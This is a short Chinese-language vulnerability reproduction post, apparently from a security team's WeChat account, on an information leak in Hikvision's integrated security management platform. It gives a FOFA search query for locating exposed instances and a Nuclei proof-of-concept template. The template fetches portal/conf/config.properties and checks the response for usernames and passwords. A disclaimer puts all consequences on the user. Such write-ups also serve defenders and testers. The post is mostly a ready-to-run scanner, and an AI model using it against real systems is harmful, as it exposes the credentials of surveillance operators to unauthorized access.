漏洞复现|**威视综合安防管理平台信息泄露_安防器材_资讯

漏洞复现|**威视综合安防管理平台信息泄露

2023-10-24 18:01 浏览:57

免责声明

由于传播、利用本公众号零点安全团队提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号零点安全团队及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉，谢谢！

由于微信公众号推送机制改变了，快来星标不再迷路，谢谢大家！

产品介绍

海康威视（Hikvision）是一家总部位于中国杭州的公司，是全球最大的视频监控产品供应商。除了传统的CCTV摄像机和网络摄像机，海康威视还提供各种相关的安防产品和解决方案。他们的综合安防管理平台为用户提供了一站式的解决方案，包括视频监控、入侵检测、访客管理、停车场管理等。

产品UI

漏洞说明

海康威视综合安防平台portal/conf/config.properties接口存在敏感信息泄露

指纹

app=”HIKVISION-综合安防管理平台”

Nuclei Poc

id: hikvision-information
info:  name: hikvision-information  author: xxx  severity: info  description:   metadata:    fofa-query: app="HIKVISION-综合安防管理平台"
requests:  - method: GET    path:      - "{{BaseURL}}portal/conf/config.properties"
    matchers-condition: and    matchers:      - type: word        part: body        words:          - '@bic'          - 'username'          - 'password'                          - type: status        status:          - 200

验证

打赏